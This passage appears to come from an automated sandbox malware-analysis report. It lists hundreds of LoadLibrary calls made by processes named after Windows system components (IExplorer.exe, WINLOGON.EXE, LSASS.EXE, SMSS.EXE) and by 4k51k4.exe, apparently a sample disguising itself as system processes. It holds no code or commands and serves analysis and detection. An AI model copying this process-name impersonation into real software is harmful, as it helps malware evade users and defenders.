(UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006060)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005992)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005968)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005968)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006128)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005484)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005484)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005484)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005484)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005484)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005484)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005984)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006084)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006084)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006084)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006084)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006084)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006084)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006080)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006080)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004168)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004168)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004168)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004168)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004168)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004168)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004168)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004168)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004244)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004244)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004244)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004244)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004244)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004244)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004220)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004220)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006064)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006064)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003992)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003992)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003996)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003996)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003996)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003996)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002256)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00002792)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002792)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003456)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003456)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003456)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003456)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003436)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003436)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003436)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003436)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003436)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003436)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003436)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000132)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000132)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002248)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004208)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004208)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003180)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003180)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003180)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003180)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003180)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003180)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004384)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004384)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003592)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003592)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001580)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001580)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003232)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003540)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003540)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003540)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003540)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003540)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003708)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003708)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004256)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004256)\n \"IExplorer.exe\" called 